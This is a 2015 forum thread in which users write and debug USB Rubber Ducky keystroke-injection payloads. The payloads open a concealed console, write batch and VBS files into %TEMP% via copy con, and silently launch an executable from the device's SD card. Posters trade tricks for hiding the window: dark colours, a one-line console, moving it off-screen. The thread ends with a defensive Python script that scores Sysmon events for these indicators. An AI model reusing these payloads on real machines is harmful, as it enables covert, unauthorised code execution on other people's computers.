overwraith, posted April 18, 2015 (edited April 18, 2015 by overwraith):

So, it has come to my attention that some of the payloads have a flaw in their processing, whereby the ducky drive finding code will not run correctly if it is not on an admin machine. I have known for a while, but haven't found a way to fix it. The other day I found out about the "vol" command in batch. So if any of you are knowledgeable in batch, I have at least one question: does the "vol" command work on more than one platform, e.g. Windows 7, XP, Vista etc.? If it does, we can retool the code to use "vol" instead of diskpart, which has a crippling error when running on non-admin computers.

Here is some code I have been working on. It executes in the command prompt, not a batch file yet. It doesn't work right yet; I am having trouble with the DuckyDrive variable not setting. If any of you know how to fix this, then please post.

    for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
        for /f "tokens=6 delims= " %i in ('Vol %d:') do if %i NEQ "Drive" if %i EQU "DUCKY" echo set DuckyDrive=%d:
    )
Xcellerator, posted April 19, 2015:

According to https://en.wikipedia.org/wiki/Vol_%28command%29, it's present in DOS, OS/2 and Windows. It doesn't specify exactly which versions of Windows, but if it was in DOS, it's probably been there since forever anyway. Nice fix, by the way!
overwraith, posted April 19, 2015:

It's not done yet; it is still erroring somewhere. I gotta try to figure out why the set command isn't working. I know the vol command is present on my computer, Windows 7, but it is reassuring to hear that it has been around since DOS.
overwraith, posted April 19, 2015 (edited April 19, 2015 by overwraith):

I figured it out; it needed quotes in the 'if' statement's first parameter. I swear, somebody needs to send me a few batch books, it is difficult gleaning a comprehensive curriculum from just online web pages and snippets. Also factor in that this stuff was pretty much before my time.

    for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
        for /f "tokens=6 delims= " %i in ('Vol %d:') do (if "%i" EQU "DUCKY" set DuckyDrive=%d: )
    )

This should be the new RunEXE from SD payload, but I haven't got a chance to test it yet. I am downloading something, and apparently every time I plug in the ducky to this expansion USB/SD card slot in the front of my computer it drops all currently connected USB devices. Weird. I need this external hard drive connected during the download.

    REM Author: overwraith
    REM Name: RunEXE_V3.txt
    REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
    REM Encoder V2.4+
    REM Using the run command for a broader OS base.
    DEFAULT_DELAY 75
    DELAY 3000
    GUI R
    DELAY 1000
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM Change directories because System32 appears to be protected.
    STRING CD %TEMP%
    ENTER
    REM Make batch file that waits for SD card to mount.
    REM Delete batch file if already exists
    STRING erase /Q DuckyWait.bat
    ENTER
    STRING copy con DuckyWait.bat
    ENTER
    REM DuckyWait.bat
    STRING :while1
    ENTER
    STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
    ENTER
    STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
    ENTER
    STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
    ENTER
    STRING )
    ENTER
    STRING )
    ENTER
    STRING if Exist %DuckyDrive% (
    ENTER
    STRING goto :break
    ENTER
    STRING )
    ENTER
    STRING timeout /t 30
    ENTER
    STRING goto :while1
    ENTER
    STRING :break
    ENTER
    REM Continue script.
    STRING START %DuckyDrive%\HelloWorld.exe
    ENTER
    CONTROL z
    ENTER
    REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
    REM Delete vbs file if already exists
    STRING erase /Q invis.vbs
    ENTER
    REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
    STRING copy con invis.vbs
    ENTER
    STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
    ENTER
    CONTROL Z
    ENTER
    REM RUN THE BATCH FILE
    STRING wscript.exe invis.vbs DuckyWait.bat
    ENTER
    STRING EXIT
    ENTER
no42, posted April 19, 2015:

and he becomes a master / ducky-jedi
overwraith, posted April 19, 2015 (edited April 19, 2015 by overwraith):

ty, I just tested it, had to change a couple of things. Works now. I altered it in my original post. It is also now on the github.
White Light, posted April 28, 2015:

Personally, I would do something like this, to avoid having to loop through each drive letter:

    for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe)

Works on Windows XP using diskpart as well as Vista+ using wmic.
overwraith, posted April 28, 2015 (edited April 28, 2015 by overwraith):

Yes, except if you are non-admin, or guest, which will make a diskpart black box pop up, derailing the script. There was a reason I was exploring alternate routes. Also, ducks used to be a lot slower than they are now; I would have to test if it automatically mounts the SD immediately.
White Light, posted May 6, 2015:

If you look, it actually only uses diskpart on XP (as XP Home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most). Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue.

In the meantime, I would suggest that instead of using

    cmd /Q /D /T:7F /F:OFF /V:ON /K

you could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember).

    cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1

Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command.
overwraith, posted May 6, 2015:

Ok, I see the logic now. That's also a good solution.
White Light, posted May 7, 2015:

Here's the VBS code I've been working on, along with the modified CMD string.

    REM DEFAULT_DELAY 20
    DELAY 2000
    GUI r
    DELAY 100
    STRING cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs
    ENTER
    DELAY 300
    STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
    ENTER
    STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
    ENTER
    STRING if d="" then wscript.sleep 500
    ENTER
    STRING loop
    ENTER
    STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1, false
    ENTER
    DELAY 10
    CTRL z
    ENTER
    DELAY 50
    STRING start "" %tmp%\z.vbs&exit
    ENTER
White Light, posted May 7, 2015:

Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize.

Some CMD switches do little or nothing at all. I've included only the ones necessary. Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in the upper-left side of the screen. The VBS code runs silent and loops until it finds the drive named "DUCKY". 90% certain the VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home.
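A detection-side companion to the two drive-finder payloads in this thread (overwraith's copy con batch loop and White Light's WMI Win32_Volume script), added here as an example and not code from either poster: it scores process-creation records against the observables those payloads leave behind (a console spawned from the Run dialog with a forced colour and a one-line window, a script typed in via copy con, wscript running a .vbs out of Temp, volume enumeration by label). Field names follow Sysmon Event ID 1; the sample records, rule weights and the alice user profile are constructed for illustration.

```python
import re
# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CurrentDirectory": r"C:\Users\alice",
     "CommandLine": r"cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CurrentDirectory": r"C:\Users\alice\AppData\Local\Temp",
     "CommandLine": r"wscript.exe invis.vbs DuckyWait.bat"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CurrentDirectory": r"C:\Users\alice",
     "CommandLine": r"wmic logicaldisk get volumename,name"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CurrentDirectory": r"C:\Users\alice", "CommandLine": r"cmd /K dir"},  # benign console
]

def _cl(pattern, e):
    return re.search(pattern, e["CommandLine"], re.I) is not None

# (tag, weight, predicate): each rule is one observable from the payloads discussed in this thread.
RULES = [
    # cmd.exe launched from the Run dialog (parent explorer.exe), i.e. the GUI r step
    ("run_dialog_cmd", 1, lambda e: e["ParentImage"].lower().endswith(r"\explorer.exe")
                           and e["Image"].lower().endswith(r"\cmd.exe")),
    # console colour forced on the command line (/T:01, /T:7F) so the text is hard to read
    ("console_colour", 1, lambda e: _cl(r"\bcmd\b.*\s/T:[0-9A-F]{2}\b", e)),
    # console shrunk to a single line with mode con
    ("tiny_console", 2, lambda e: _cl(r"mode\s+con\s+cols=\d+\s+lines=1\b", e)),
    # a .bat/.vbs typed in through copy con: no download and no dropper binary written by a tool
    ("copy_con_script", 2, lambda e: _cl(r"copy(?:\s+/y)?\s+con\s+\S+\.(?:bat|vbs)\b", e)),
    # wscript/cscript running a .vbs out of the user's Temp directory
    ("temp_vbs_host", 2, lambda e: re.search(r"\\[wc]script\.exe$", e["Image"], re.I) is not None
                          and _cl(r"\.vbs\b", e)
                          and re.search(r"\\temp\b", e["CurrentDirectory"] + " " + e["CommandLine"], re.I) is not None),
    # volume enumeration by label (diskpart list volume, wmic logicaldisk, Win32_Volume); weak on its own
    ("volume_enum", 1, lambda e: _cl(r"wmic\s+logicaldisk\s+get\s+volumename|Win32_Volume|list\s+volume", e)),
]

def score_event(event):
    """Return (score, tags) for one process-creation record."""
    hits = [(tag, w) for tag, w, pred in RULES if pred(event)]
    return sum(w for _, w in hits), [tag for tag, _ in hits]

def triage(events, threshold=2):
    """Return [(index, score, tags)] for records whose combined score reaches the threshold."""
    return [(i, s, t) for i, (s, t) in enumerate(map(score_event, events)) if s >= threshold]

if __name__ == "__main__":
    for i, score, tags in triage(SAMPLE_EVENTS):
        print(f"event {i}: score {score} {tags}")
```

The benign `cmd /K dir` record and the lone wmic query stay below the threshold; only the combination of indicators raises an alert, which is the point of scoring rather than matching single strings.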